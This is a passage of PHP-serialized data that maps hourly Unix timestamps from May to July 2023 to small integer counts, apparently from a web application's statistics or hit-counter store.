:1683252000;a:1:{i:0;i:2;}i:1683255600;a:1:{i:0;i:2;}i:1683259200;a:1:{i:0;i:1;}i:1683262800;a:1:{i:0;i:8;}i:1683266400;a:1:{i:0;i:10;}i:1683270000;a:1:{i:0;i:7;}i:1683273600;a:1:{i:0;i:8;}i:1683277200;a:1:{i:0;i:3;}i:1683280800;a:1:{i:0;i:6;}i:1683284400;a:1:{i:0;i:4;}i:1683288000;a:1:{i:0;i:8;}i:1683291600;a:1:{i:0;i:7;}i:1683295200;a:1:{i:0;i:2;}i:1683298800;a:1:{i:0;i:3;}i:1683302400;a:1:{i:0;i:1;}i:1683306000;a:1:{i:0;i:4;}i:1683309600;a:1:{i:0;i:11;}i:1683313200;a:1:{i:0;i:5;}i:1683316800;a:1:{i:0;i:2;}i:1683320400;a:1:{i:0;i:10;}i:1683324000;a:1:{i:0;i:2;}i:1683327600;a:1:{i:0;i:1;}i:1683331200;a:1:{i:0;i:7;}i:1683334800;a:1:{i:0;i:4;}i:1683338400;a:1:{i:0;i:5;}i:1683342000;a:1:{i:0;i:2;}i:1683345600;a:1:{i:0;i:3;}i:1683349200;a:1:{i:0;i:5;}i:1683352800;a:1:{i:0;i:5;}i:1683356400;a:1:{i:0;i:2;}i:1683360000;a:1:{i:0;i:6;}i:1683363600;a:1:{i:0;i:3;}i:1683367200;a:1:{i:0;i:2;}i:1683370800;a:1:{i:0;i:2;}i:1683374400;a:1:{i:0;i:2;}i:1683378000;a:1:{i:0;i:1;}i:1683381600;a:1:{i:0;i:1;}i:1683392400;a:1:{i:0;i:1;}i:1683396000;a:1:{i:0;i:1;}i:1683403200;a:1:{i:0;i:3;}i:1683406800;a:1:{i:0;i:3;}i:1683410400;a:1:{i:0;i:3;}i:1683442800;a:1:{i:0;i:3;}i:1683446400;a:1:{i:0;i:9;}i:1683450000;a:1:{i:0;i:11;}i:1683453600;a:1:{i:0;i:13;}i:1683457200;a:1:{i:0;i:4;}i:1683460800;a:1:{i:0;i:6;}i:1683464400;a:1:{i:0;i:10;}i:1683468000;a:1:{i:0;i:8;}i:1683471600;a:1:{i:0;i:9;}i:1683475200;a:1:{i:0;i:8;}i:1683478800;a:1:{i:0;i:7;}i:1683482400;a:1:{i:0;i:9;}i:1683486000;a:1:{i:0;i:8;}i:1683489600;a:1:{i:0;i:15;}i:1683493200;a:1:{i:0;i:9;}i:1683496800;a:1:{i:0;i:9;}i:1683500400;a:1:{i:0;i:8;}i:1683504000;a:1:{i:0;i:6;}i:1683507600;a:1:{i:0;i:4;}i:1683511200;a:1:{i:0;i:6;}i:1683514800;a:1:{i:0;i:4;}i:1683518400;a:1:{i:0;i:8;}i:1683522000;a:1:{i:0;i:11;}i:1683525600;a:1:{i:0;i:13;}i:1683529200;a:1:{i:0;i:12;}i:1683532800;a:1:{i:0;i:11;}i:1683536400;a:1:{i:0;i:11;}i:1683540000;a:1:{i:0;i:7;}i:1683543600;a:1:{i:0;i:5;}i:1683547200;a:1:{i:0;i:3;}i:1683550800;a:1:{i:0;i:6;}i:1683554400;a:1:{i:0;i:10;}i:1683558000;a:1:{i:0;i:3;}i:1683565200;a:1:{i:0;i:3;}i:1683568800;a:1:{i:0;i:6;}i:1683572400;a:1:{i:0;i:7;}i:1683576000;a:1:{i:0;i:7;}i:1683579600;a:1:{i:0;i:2;}i:1683583200;a:1:{i:0;i:2;}i:1683586800;a:1:{i:0;i:4;}i:1683590400;a:1:{i:0;i:4;}i:1683597600;a:1:{i:0;i:3;}i:1683601200;a:1:{i:0;i:6;}i:1683604800;a:1:{i:0;i:5;}i:1683608400;a:1:{i:0;i:2;}i:1683612000;a:1:{i:0;i:6;}i:1683615600;a:1:{i:0;i:8;}i:1683619200;a:1:{i:0;i:6;}i:1683622800;a:1:{i:0;i:4;}i:1683626400;a:1:{i:0;i:3;}i:1683630000;a:1:{i:0;i:3;}i:1683633600;a:1:{i:0;i:2;}i:1683637200;a:1:{i:0;i:2;}i:1683640800;a:1:{i:0;i:3;}i:1683644400;a:1:{i:0;i:6;}i:1683648000;a:1:{i:0;i:4;}i:1683651600;a:1:{i:0;i:2;}i:1683655200;a:1:{i:0;i:3;}i:1683658800;a:1:{i:0;i:9;}i:1683662400;a:1:{i:0;i:9;}i:1683666000;a:1:{i:0;i:5;}i:1683669600;a:1:{i:0;i:4;}i:1683673200;a:1:{i:0;i:6;}i:1683676800;a:1:{i:0;i:3;}i:1683680400;a:1:{i:0;i:3;}i:1683684000;a:1:{i:0;i:1;}i:1683687600;a:1:{i:0;i:2;}i:1683691200;a:1:{i:0;i:4;}i:1683694800;a:1:{i:0;i:4;}i:1683698400;a:1:{i:0;i:1;}i:1683702000;a:1:{i:0;i:2;}i:1683705600;a:1:{i:0;i:1;}i:1683712800;a:1:{i:0;i:1;}i:1683716400;a:1:{i:0;i:3;}i:1683720000;a:1:{i:0;i:2;}i:1683723600;a:1:{i:0;i:6;}i:1683727200;a:1:{i:0;i:3;}i:1683738000;a:1:{i:0;i:1;}i:1683741600;a:1:{i:0;i:1;}i:1683748800;a:1:{i:0;i:1;}i:1683752400;a:1:{i:0;i:1;}i:1683759600;a:1:{i:0;i:8;}i:1683763200;a:1:{i:0;i:7;}i:1683766800;a:1:{i:0;i:6;}i:1683770400;a:1:{i:0;i:6;}i:1683774000;a:1:{i:0;i:7;}i:1683777600;a:1:{i:0;i:8;}i:1683781200;a:1:{i:0;i:11;}i:1683784800;a:1:{i:0;i:9;}i:1683788400;a:1:{i:0;i:13;}i:1683792000;a:1:{i:0;i:10;}i:1683795600;a:1:{i:0;i:4;}i:1683799200;a:1:{i:0;i:7;}i:1683802800;a:1:{i:0;i:7;}i:1683806400;a:1:{i:0;i:6;}i:1683810000;a:1:{i:0;i:4;}i:1683813600;a:1:{i:0;i:4;}i:1683817200;a:1:{i:0;i:3;}i:1683820800;a:1:{i:0;i:2;}i:1683824400;a:1:{i:0;i:3;}i:1683828000;a:1:{i:0;i:4;}i:1683831600;a:1:{i:0;i:9;}i:1683835200;a:1:{i:0;i:12;}i:1683838800;a:1:{i:0;i:13;}i:1683842400;a:1:{i:0;i:9;}i:1683846000;a:1:{i:0;i:11;}i:1683849600;a:1:{i:0;i:8;}i:1683853200;a:1:{i:0;i:6;}i:1683856800;a:1:{i:0;i:8;}i:1683860400;a:1:{i:0;i:10;}i:1683864000;a:1:{i:0;i:6;}i:1683867600;a:1:{i:0;i:4;}i:1683871200;a:1:{i:0;i:4;}i:1683874800;a:1:{i:0;i:3;}i:1683878400;a:1:{i:0;i:12;}i:1683882000;a:1:{i:0;i:7;}i:1683885600;a:1:{i:0;i:5;}i:1683889200;a:1:{i:0;i:7;}i:1683892800;a:1:{i:0;i:7;}i:1683896400;a:1:{i:0;i:4;}i:1683900000;a:1:{i:0;i:1;}i:1683903600;a:1:{i:0;i:6;}i:1683907200;a:1:{i:0;i:7;}i:1683910800;a:1:{i:0;i:7;}i:1683914400;a:1:{i:0;i:1;}i:1683918000;a:1:{i:0;i:1;}i:1683921600;a:1:{i:0;i:1;}i:1683925200;a:1:{i:0;i:5;}i:1683928800;a:1:{i:0;i:6;}i:1683932400;a:1:{i:0;i:4;}i:1683936000;a:1:{i:0;i:1;}i:1683939600;a:1:{i:0;i:1;}i:1683943200;a:1:{i:0;i:2;}i:1683946800;a:1:{i:0;i:1;}i:1683950400;a:1:{i:0;i:1;}i:1683954000;a:1:{i:0;i:1;}i:1683957600;a:1:{i:0;i:1;}i:1683961200;a:1:{i:0;i:1;}i:1683968400;a:1:{i:0;i:1;}i:1683972000;a:1:{i:0;i:1;}i:1683975600;a:1:{i:0;i:1;}i:1683979200;a:1:{i:0;i:2;}i:1683982800;a:1:{i:0;i:4;}i:1683986400;a:1:{i:0;i:3;}i:1683990000;a:1:{i:0;i:3;}i:1683993600;a:1:{i:0;i:6;}i:1683997200;a:1:{i:0;i:6;}i:1684000800;a:1:{i:0;i:6;}i:1684004400;a:1:{i:0;i:6;}i:1684008000;a:1:{i:0;i:5;}i:1684011600;a:1:{i:0;i:5;}i:1684015200;a:1:{i:0;i:7;}i:1684018800;a:1:{i:0;i:5;}i:1684022400;a:1:{i:0;i:7;}i:1684026000;a:1:{i:0;i:6;}i:1684029600;a:1:{i:0;i:3;}i:1684033200;a:1:{i:0;i:2;}i:1684036800;a:1:{i:0;i:4;}i:1684040400;a:1:{i:0;i:2;}i:1684044000;a:1:{i:0;i:8;}i:1684047600;a:1:{i:0;i:10;}i:1684051200;a:1:{i:0;i:4;}i:1684054800;a:1:{i:0;i:10;}i:1684058400;a:1:{i:0;i:8;}i:1684062000;a:1:{i:0;i:6;}i:1684065600;a:1:{i:0;i:7;}i:1684069200;a:1:{i:0;i:9;}i:1684072800;a:1:{i:0;i:3;}i:1684076400;a:1:{i:0;i:2;}i:1684080000;a:1:{i:0;i:2;}i:1684083600;a:1:{i:0;i:1;}i:1684087200;a:1:{i:0;i:5;}i:1684090800;a:1:{i:0;i:2;}i:1684094400;a:1:{i:0;i:9;}i:1684098000;a:1:{i:0;i:4;}i:1684101600;a:1:{i:0;i:5;}i:1684105200;a:1:{i:0;i:10;}i:1684108800;a:1:{i:0;i:11;}i:1684112400;a:1:{i:0;i:12;}i:1684116000;a:1:{i:0;i:3;}i:1684119600;a:1:{i:0;i:10;}i:1684123200;a:1:{i:0;i:8;}i:1684126800;a:1:{i:0;i:6;}i:1684130400;a:1:{i:0;i:13;}i:1684134000;a:1:{i:0;i:9;}i:1684137600;a:1:{i:0;i:8;}i:1684141200;a:1:{i:0;i:12;}i:1684144800;a:1:{i:0;i:5;}i:1684148400;a:1:{i:0;i:6;}i:1684152000;a:1:{i:0;i:13;}i:1684155600;a:1:{i:0;i:4;}i:1684166400;a:1:{i:0;i:3;}i:1684170000;a:1:{i:0;i:4;}i:1684177200;a:1:{i:0;i:5;}i:1684180800;a:1:{i:0;i:5;}i:1684184400;a:1:{i:0;i:1;}i:1684188000;a:1:{i:0;i:2;}i:1684191600;a:1:{i:0;i:1;}i:1684195200;a:1:{i:0;i:2;}i:1684198800;a:1:{i:0;i:3;}i:1684202400;a:1:{i:0;i:5;}i:1684206000;a:1:{i:0;i:3;}i:1684209600;a:1:{i:0;i:9;}i:1684213200;a:1:{i:0;i:4;}i:1684216800;a:1:{i:0;i:8;}i:1684220400;a:1:{i:0;i:5;}i:1684224000;a:1:{i:0;i:3;}i:1684227600;a:1:{i:0;i:5;}i:1684231200;a:1:{i:0;i:2;}i:1684234800;a:1:{i:0;i:3;}i:1684238400;a:1:{i:0;i:4;}i:1684242000;a:1:{i:0;i:6;}i:1684245600;a:1:{i:0;i:1;}i:1684249200;a:1:{i:0;i:8;}i:1684252800;a:1:{i:0;i:2;}i:1684256400;a:1:{i:0;i:4;}i:1684260000;a:1:{i:0;i:7;}i:1684263600;a:1:{i:0;i:5;}i:1684267200;a:1:{i:0;i:1;}i:1684270800;a:1:{i:0;i:2;}i:1684274400;a:1:{i:0;i:2;}i:1684281600;a:1:{i:0;i:5;}i:1684285200;a:1:{i:0;i:4;}i:1684288800;a:1:{i:0;i:8;}i:1684292400;a:1:{i:0;i:3;}i:1684296000;a:1:{i:0;i:4;}i:1684299600;a:1:{i:0;i:4;}i:1684303200;a:1:{i:0;i:4;}i:1684306800;a:1:{i:0;i:3;}i:1684310400;a:1:{i:0;i:2;}i:1684314000;a:1:{i:0;i:5;}i:1684317600;a:1:{i:0;i:7;}i:1684321200;a:1:{i:0;i:1;}i:1684324800;a:1:{i:0;i:4;}i:1684328400;a:1:{i:0;i:4;}i:1684332000;a:1:{i:0;i:1;}i:1684335600;a:1:{i:0;i:1;}i:1684339200;a:1:{i:0;i:2;}i:1684342800;a:1:{i:0;i:1;}i:1684346400;a:1:{i:0;i:6;}i:1684350000;a:1:{i:0;i:6;}i:1684353600;a:1:{i:0;i:4;}i:1684357200;a:1:{i:0;i:1;}i:1684360800;a:1:{i:0;i:1;}i:1684364400;a:1:{i:0;i:1;}i:1684371600;a:1:{i:0;i:3;}i:1684375200;a:1:{i:0;i:2;}i:1684378800;a:1:{i:0;i:1;}i:1684382400;a:1:{i:0;i:1;}i:1684386000;a:1:{i:0;i:2;}i:1684389600;a:1:{i:0;i:1;}i:1684393200;a:1:{i:0;i:1;}i:1684396800;a:1:{i:0;i:2;}i:1684400400;a:1:{i:0;i:1;}i:1684404000;a:1:{i:0;i:2;}i:1684407600;a:1:{i:0;i:1;}i:1684411200;a:1:{i:0;i:4;}i:1684414800;a:1:{i:0;i:2;}i:1684429200;a:1:{i:0;i:3;}i:1684443600;a:1:{i:0;i:6;}i:1684447200;a:1:{i:0;i:3;}i:1684450800;a:1:{i:0;i:9;}i:1684454400;a:1:{i:0;i:7;}i:1684458000;a:1:{i:0;i:8;}i:1684461600;a:1:{i:0;i:8;}i:1684465200;a:1:{i:0;i:3;}i:1684468800;a:1:{i:0;i:5;}i:1684472400;a:1:{i:0;i:8;}i:1684476000;a:1:{i:0;i:9;}i:1684479600;a:1:{i:0;i:12;}i:1684483200;a:1:{i:0;i:8;}i:1684486800;a:1:{i:0;i:7;}i:1684490400;a:1:{i:0;i:9;}i:1684494000;a:1:{i:0;i:6;}i:1684497600;a:1:{i:0;i:4;}i:1684501200;a:1:{i:0;i:6;}i:1684504800;a:1:{i:0;i:9;}i:1684508400;a:1:{i:0;i:3;}i:1684512000;a:1:{i:0;i:2;}i:1684515600;a:1:{i:0;i:8;}i:1684519200;a:1:{i:0;i:4;}i:1684522800;a:1:{i:0;i:2;}i:1684526400;a:1:{i:0;i:4;}i:1684530000;a:1:{i:0;i:2;}i:1684533600;a:1:{i:0;i:15;}i:1684537200;a:1:{i:0;i:2;}i:1684540800;a:1:{i:0;i:3;}i:1684544400;a:1:{i:0;i:4;}i:1684548000;a:1:{i:0;i:2;}i:1684551600;a:1:{i:0;i:5;}i:1684555200;a:1:{i:0;i:4;}i:1684558800;a:1:{i:0;i:5;}i:1684562400;a:1:{i:0;i:4;}i:1684566000;a:1:{i:0;i:5;}i:1684569600;a:1:{i:0;i:3;}i:1684573200;a:1:{i:0;i:3;}i:1684576800;a:1:{i:0;i:5;}i:1684580400;a:1:{i:0;i:3;}i:1684584000;a:1:{i:0;i:5;}i:1684587600;a:1:{i:0;i:3;}i:1684591200;a:1:{i:0;i:4;}i:1684594800;a:1:{i:0;i:2;}i:1684598400;a:1:{i:0;i:1;}i:1684602000;a:1:{i:0;i:1;}i:1684605600;a:1:{i:0;i:2;}i:1684609200;a:1:{i:0;i:3;}i:1684612800;a:1:{i:0;i:1;}i:1684616400;a:1:{i:0;i:2;}i:1684620000;a:1:{i:0;i:3;}i:1684623600;a:1:{i:0;i:4;}i:1684630800;a:1:{i:0;i:1;}i:1684634400;a:1:{i:0;i:3;}i:1684638000;a:1:{i:0;i:2;}i:1684641600;a:1:{i:0;i:4;}i:1684645200;a:1:{i:0;i:1;}i:1684648800;a:1:{i:0;i:1;}i:1684652400;a:1:{i:0;i:2;}i:1684656000;a:1:{i:0;i:1;}i:1684659600;a:1:{i:0;i:1;}i:1684663200;a:1:{i:0;i:4;}i:1684666800;a:1:{i:0;i:3;}i:1684670400;a:1:{i:0;i:4;}i:1684674000;a:1:{i:0;i:3;}i:1684681200;a:2:{i:0;i:2;i:1;i:1;}i:1684684800;a:1:{i:0;i:3;}i:1684688400;a:1:{i:0;i:8;}i:1684692000;a:1:{i:0;i:5;}i:1684695600;a:2:{i:0;i:8;i:1;i:1;}i:1684699200;a:1:{i:0;i:3;}i:1684702800;a:1:{i:0;i:4;}i:1684706400;a:1:{i:0;i:1;}i:1684710000;a:1:{i:0;i:1;}i:1684713600;a:1:{i:0;i:1;}i:1684717200;a:1:{i:0;i:2;}i:1684720800;a:1:{i:0;i:1;}i:1684728000;a:1:{i:0;i:6;}i:1684731600;a:1:{i:0;i:1;}i:1684753200;a:1:{i:0;i:3;}i:1684756800;a:1:{i:0;i:3;}i:1684760400;a:1:{i:0;i:3;}i:1684778400;a:1:{i:0;i:3;}i:1684796400;a:1:{i:0;i:3;}i:1684800000;a:1:{i:0;i:3;}i:1684803600;a:1:{i:0;i:3;}i:1684810800;a:1:{i:0;i:10;}i:1684814400;a:1:{i:0;i:3;}i:1684818000;a:1:{i:0;i:4;}i:1684821600;a:1:{i:0;i:5;}i:1684825200;a:1:{i:0;i:8;}i:1684828800;a:1:{i:0;i:4;}i:1684832400;a:1:{i:0;i:5;}i:1684836000;a:1:{i:0;i:3;}i:1684843200;a:1:{i:0;i:5;}i:1684846800;a:1:{i:0;i:1;}i:1684850400;a:1:{i:0;i:4;}i:1684854000;a:1:{i:0;i:3;}i:1684857600;a:1:{i:0;i:5;}i:1684861200;a:1:{i:0;i:3;}i:1684864800;a:1:{i:0;i:4;}i:1684868400;a:1:{i:0;i:5;}i:1684872000;a:1:{i:0;i:3;}i:1684879200;a:1:{i:0;i:2;}i:1684882800;a:1:{i:0;i:2;}i:1684886400;a:1:{i:0;i:2;}i:1684890000;a:1:{i:0;i:3;}i:1684893600;a:1:{i:0;i:2;}i:1684897200;a:1:{i:0;i:2;}i:1684900800;a:1:{i:0;i:2;}i:1684904400;a:1:{i:0;i:1;}i:1684908000;a:1:{i:0;i:3;}i:1684911600;a:1:{i:0;i:2;}i:1684915200;a:1:{i:0;i:3;}i:1684918800;a:1:{i:0;i:2;}i:1684922400;a:1:{i:0;i:3;}i:1684926000;a:1:{i:0;i:3;}i:1684929600;a:1:{i:0;i:2;}i:1684933200;a:1:{i:0;i:2;}i:1684936800;a:1:{i:0;i:4;}i:1684951200;a:1:{i:0;i:3;}i:1684972800;a:1:{i:0;i:1;}i:1684976400;a:1:{i:0;i:2;}i:1684980000;a:1:{i:0;i:3;}i:1684983600;a:1:{i:0;i:5;}i:1684987200;a:1:{i:0;i:10;}i:1684990800;a:1:{i:0;i:14;}i:1684994400;a:1:{i:0;i:17;}i:1684998000;a:1:{i:0;i:14;}i:1685001600;a:1:{i:0;i:14;}i:1685005200;a:1:{i:0;i:12;}i:1685008800;a:1:{i:0;i:9;}i:1685012400;a:1:{i:0;i:13;}i:1685016000;a:2:{i:0;i:16;i:1;i:1;}i:1685019600;a:1:{i:0;i:7;}i:1685023200;a:1:{i:0;i:7;}i:1685026800;a:1:{i:0;i:9;}i:1685030400;a:1:{i:0;i:8;}i:1685034000;a:1:{i:0;i:6;}i:1685037600;a:1:{i:0;i:5;}i:1685041200;a:1:{i:0;i:3;}i:1685044800;a:1:{i:0;i:6;}i:1685048400;a:1:{i:0;i:4;}i:1685052000;a:1:{i:0;i:5;}i:1685055600;a:1:{i:0;i:3;}i:1685059200;a:1:{i:0;i:3;}i:1685062800;a:1:{i:0;i:3;}i:1685066400;a:1:{i:0;i:2;}i:1685070000;a:1:{i:0;i:2;}i:1685073600;a:1:{i:0;i:5;}i:1685077200;a:1:{i:0;i:3;}i:1685080800;a:1:{i:0;i:1;}i:1685084400;a:1:{i:0;i:3;}i:1685088000;a:1:{i:0;i:3;}i:1685091600;a:1:{i:0;i:2;}i:1685095200;a:1:{i:0;i:1;}i:1685098800;a:1:{i:0;i:1;}i:1685102400;a:1:{i:0;i:3;}i:1685109600;a:1:{i:0;i:6;}i:1685142000;a:1:{i:0;i:1;}i:1685149200;a:1:{i:0;i:3;}i:1685178000;a:1:{i:0;i:1;}i:1685181600;a:1:{i:0;i:3;}i:1685185200;a:1:{i:0;i:3;}i:1685188800;a:1:{i:0;i:4;}i:1685192400;a:1:{i:0;i:4;}i:1685196000;a:1:{i:0;i:6;}i:1685199600;a:1:{i:0;i:3;}i:1685203200;a:1:{i:0;i:2;}i:1685206800;a:1:{i:0;i:4;}i:1685210400;a:1:{i:0;i:5;}i:1685214000;a:1:{i:0;i:3;}i:1685224800;a:1:{i:0;i:5;}i:1685228400;a:1:{i:0;i:2;}i:1685232000;a:1:{i:0;i:1;}i:1685235600;a:1:{i:0;i:3;}i:1685239200;a:1:{i:0;i:5;}i:1685242800;a:1:{i:0;i:3;}i:1685246400;a:1:{i:0;i:5;}i:1685250000;a:1:{i:0;i:7;}i:1685253600;a:1:{i:0;i:2;}i:1685257200;a:1:{i:0;i:4;}i:1685260800;a:1:{i:0;i:2;}i:1685264400;a:1:{i:0;i:6;}i:1685271600;a:1:{i:0;i:1;}i:1685275200;a:1:{i:0;i:2;}i:1685278800;a:1:{i:0;i:1;}i:1685282400;a:1:{i:0;i:2;}i:1685286000;a:1:{i:0;i:1;}i:1685289600;a:1:{i:0;i:2;}i:1685293200;a:1:{i:0;i:1;}i:1685296800;a:1:{i:0;i:2;}i:1685300400;a:1:{i:0;i:1;}i:1685304000;a:1:{i:0;i:2;}i:1685307600;a:1:{i:0;i:1;}i:1685314800;a:1:{i:0;i:1;}i:1685318400;a:1:{i:0;i:1;}i:1685325600;a:1:{i:0;i:1;}i:1685329200;a:1:{i:0;i:8;}i:1685332800;a:1:{i:1;i:1;}i:1685336400;a:1:{i:0;i:1;}i:1685340000;a:1:{i:1;i:1;}i:1685343600;a:1:{i:0;i:1;}i:1685347200;a:1:{i:0;i:4;}i:1685350800;a:1:{i:0;i:1;}i:1685361600;a:1:{i:0;i:1;}i:1685365200;a:1:{i:0;i:2;}i:1685379600;a:1:{i:0;i:1;}i:1685437200;a:1:{i:1;i:1;}i:1685455200;a:1:{i:1;i:1;}i:1685469600;a:1:{i:1;i:2;}i:1685480400;a:1:{i:0;i:4;}i:1685556000;a:1:{i:0;i:3;}i:1685559600;a:1:{i:0;i:4;}i:1685563200;a:1:{i:0;i:2;}i:1685566800;a:1:{i:0;i:1;}i:1685592000;a:1:{i:1;i:1;}i:1685610000;a:1:{i:0;i:4;}i:1685617200;a:1:{i:1;i:1;}i:1685628000;a:1:{i:0;i:1;}i:1685782800;a:1:{i:1;i:1;}i:1685800800;a:1:{i:1;i:2;}i:1685808000;a:1:{i:1;i:1;}i:1685818800;a:1:{i:1;i:1;}i:1685887200;a:1:{i:0;i:1;}i:1685890800;a:1:{i:0;i:3;}i:1685894400;a:1:{i:0;i:1;}i:1685898000;a:1:{i:0;i:1;}i:1685901600;a:1:{i:1;i:1;}i:1685905200;a:1:{i:1;i:1;}i:1685941200;a:1:{i:1;i:1;}i:1685952000;a:1:{i:0;i:1;}i:1685959200;a:1:{i:1;i:3;}i:1685966400;a:2:{i:1;i:1;i:0;i:1;}i:1686016800;a:1:{i:0;i:1;}i:1686020400;a:1:{i:0;i:1;}i:1686031200;a:1:{i:0;i:1;}i:1686038400;a:1:{i:1;i:1;}i:1686052800;a:1:{i:0;i:2;}i:1686070800;a:1:{i:1;i:2;}i:1686074400;a:1:{i:1;i:1;}i:1686106800;a:1:{i:0;i:3;}i:1686153600;a:1:{i:1;i:1;}i:1686168000;a:1:{i:1;i:1;}i:1686196800;a:1:{i:1;i:2;}i:1686225600;a:1:{i:1;i:2;}i:1686229200;a:1:{i:1;i:3;}i:1686268800;a:1:{i:0;i:1;}i:1686384000;a:1:{i:1;i:2;}i:1686405600;a:1:{i:1;i:3;}i:1686412800;a:1:{i:1;i:1;}i:1686430800;a:1:{i:1;i:1;}i:1686459600;a:1:{i:1;i:1;}i:1686463200;a:1:{i:1;i:1;}i:1686470400;a:1:{i:1;i:1;}i:1686474000;a:1:{i:1;i:1;}i:1686499200;a:1:{i:1;i:1;}i:1686502800;a:1:{i:1;i:1;}i:1686506400;a:1:{i:1;i:1;}i:1686520800;a:1:{i:0;i:1;}i:1686646800;a:1:{i:1;i:2;}i:1686654000;a:1:{i:1;i:2;}i:1686657600;a:1:{i:0;i:1;}i:1686661200;a:1:{i:0;i:3;}i:1686664800;a:1:{i:0;i:3;}i:1686668400;a:1:{i:0;i:3;}i:1686675600;a:1:{i:1;i:2;}i:1686682800;a:1:{i:1;i:1;}i:1686715200;a:1:{i:0;i:1;}i:1686718800;a:1:{i:1;i:1;}i:1686744000;a:1:{i:0;i:1;}i:1686801600;a:1:{i:1;i:1;}i:1686808800;a:1:{i:1;i:1;}i:1686830400;a:2:{i:0;i:2;i:1;i:1;}i:1686852000;a:1:{i:0;i:1;}i:1686862800;a:1:{i:0;i:1;}i:1686866400;a:1:{i:0;i:1;}i:1686891600;a:1:{i:1;i:1;}i:1686895200;a:1:{i:1;i:1;}i:1686906000;a:1:{i:0;i:1;}i:1686942000;a:1:{i:1;i:1;}i:1686974400;a:1:{i:1;i:1;}i:1686978000;a:1:{i:1;i:1;}i:1686985200;a:1:{i:1;i:1;}i:1686999600;a:1:{i:1;i:1;}i:1687017600;a:1:{i:1;i:1;}i:1687024800;a:1:{i:1;i:1;}i:1687028400;a:1:{i:1;i:1;}i:1687035600;a:1:{i:1;i:3;}i:1687060800;a:1:{i:1;i:1;}i:1687068000;a:1:{i:1;i:3;}i:1687093200;a:1:{i:1;i:2;}i:1687140000;a:1:{i:0;i:1;}i:1687143600;a:1:{i:0;i:1;}i:1687183200;a:1:{i:0;i:1;}i:1687230000;a:1:{i:0;i:1;}i:1687255200;a:1:{i:0;i:3;}i:1687269600;a:1:{i:1;i:1;}i:1687276800;a:1:{i:1;i:1;}i:1687338000;a:1:{i:1;i:1;}i:1687341600;a:1:{i:1;i:2;}i:1687348800;a:1:{i:1;i:2;}i:1687359600;a:1:{i:1;i:3;}i:1687363200;a:1:{i:1;i:1;}i:1687366800;a:1:{i:1;i:1;}i:1687370400;a:2:{i:1;i:1;i:0;i:3;}i:1687374000;a:2:{i:1;i:1;i:0;i:3;}i:1687377600;a:1:{i:0;i:4;}i:1687392000;a:1:{i:0;i:9;}i:1687395600;a:1:{i:0;i:1;}i:1687413600;a:1:{i:0;i:7;}i:1687428000;a:1:{i:0;i:1;}i:1687435200;a:1:{i:0;i:1;}i:1687449600;a:1:{i:0;i:3;}i:1687460400;a:1:{i:0;i:6;}i:1687464000;a:1:{i:0;i:8;}i:1687474800;a:1:{i:0;i:1;}i:1687489200;a:1:{i:0;i:2;}i:1687492800;a:1:{i:0;i:2;}i:1687496400;a:1:{i:0;i:3;}i:1687510800;a:1:{i:0;i:2;}i:1687518000;a:1:{i:0;i:3;}i:1687525200;a:1:{i:0;i:2;}i:1687532400;a:1:{i:0;i:3;}i:1687554000;a:1:{i:0;i:1;}i:1687575600;a:1:{i:0;i:1;}i:1687579200;a:1:{i:0;i:2;}i:1687590000;a:1:{i:1;i:1;}i:1687597200;a:1:{i:0;i:3;}i:1687618800;a:1:{i:0;i:1;}i:1687626000;a:1:{i:1;i:1;}i:1687629600;a:1:{i:0;i:1;}i:1687654800;a:1:{i:0;i:1;}i:1687676400;a:1:{i:0;i:1;}i:1687680000;a:1:{i:0;i:1;}i:1687712400;a:1:{i:0;i:3;}i:1687726800;a:1:{i:0;i:2;}i:1687730400;a:1:{i:0;i:3;}i:1687737600;a:1:{i:0;i:1;}i:1687752000;a:1:{i:0;i:3;}i:1687755600;a:1:{i:0;i:3;}i:1687759200;a:1:{i:1;i:1;}i:1687762800;a:1:{i:1;i:2;}i:1687766400;a:1:{i:0;i:4;}i:1687773600;a:1:{i:1;i:5;}i:1687788000;a:1:{i:0;i:4;}i:1687806000;a:2:{i:1;i:2;i:0;i:1;}i:1687813200;a:1:{i:0;i:3;}i:1687827600;a:1:{i:0;i:2;}i:1687845600;a:1:{i:1;i:1;}i:1687874400;a:1:{i:0;i:1;}i:1687878000;a:1:{i:0;i:1;}i:1687885200;a:1:{i:0;i:1;}i:1687888800;a:1:{i:1;i:1;}i:1687906800;a:1:{i:0;i:1;}i:1687921200;a:1:{i:0;i:1;}i:1687989600;a:1:{i:0;i:3;}i:1688007600;a:1:{i:0;i:3;}i:1688022000;a:1:{i:0;i:1;}i:1688079600;a:1:{i:0;i:3;}i:1688108400;a:1:{i:0;i:1;}i:1688112000;a:1:{i:1;i:2;}i:1688126400;a:2:{i:1;i:1;i:0;i:3;}i:1688130000;a:2:{i:0;i:3;i:1;i:5;}i:1688137200;a:1:{i:0;i:3;}i:1688158800;a:2:{i:1;i:6;i:0;i:3;}i:1688184000;a:1:{i:0;i:1;}i:1688191200;a:2:{i:0;i:1;i:1;i:1;}i:1688198400;a:1:{i:0;i:1;}i:1688216400;a:1:{i:0;i:3;}i:1688230800;a:1:{i:0;i:3;}i:1688252400;a:1:{i:0;i:3;}i:1688270400;a:1:{i:0;i:1;}i:1688284800;a:2:{i:0;i:1;i:1;i:1;}i:1688288400;a:1:{i:1;i:4;}i:1688295600;a:1:{i:1;i:1;}i:1688310000;a:1:{i:1;i:2;}i:1688328000;a:1:{i:1;i:1;}i:1688360400;a:1:{i:1;i:1;}i:1688374800;a:1:{i:1;i:1;}i:1688385600;a:1:{i:1;i:1;}i:1688392800;a:1:{i:0;i:3;}i:1688418000;a:1:{i:0;i:1;}i:1688436000;a:1:{i:0;i:1;}i:1688439600;a:1:{i:0;i:1;}i:1688468400;a:1:{i:0;i:3;}i:1688472000;a:1:{i:0;i:1;}i:1688479200;a:1:{i:1;i:1;}i:1688490000;a:1:{i:1;i:1;}i:1688515200;a:1:{i:0;i:3;}i:1688544000;a:1:{i:1;i:1;}i:1688562000;a:1:{i:0;i:1;}i:1688565600;a:1:{i:0;i:3;}i:1688569200;a:1:{i:0;i:1;}i:1688608800;a:1:{i:0;i:1;}i:1688616000;a:1:{i:0;i:1;}i:1688644800;a:1:{i:0;i:4;}i:1688648400;a:1:{i:0;i:4;}i:1688652000;a:1:{i:0;i:4;}i:1688659200;a:1:{i:0;i:1;}i:1688670000;a:1:{i:0;i:3;}i:1688688000;a:1:{i:0;i:1;}i:1688698800;a:1:{i:0;i:1;}i:1688702400;a:1:{i:0;i:4;}i:1688706000;a:1:{i:0;i:3;}i:1688727600;a:1:{i:0;i:1;}i:1688745600;a:1:{i:0;i:2;}i:1688760000;a:1:{i:0;i:1;}i:1688806800;a:1:{i:1;i:2;}i:1688821200;a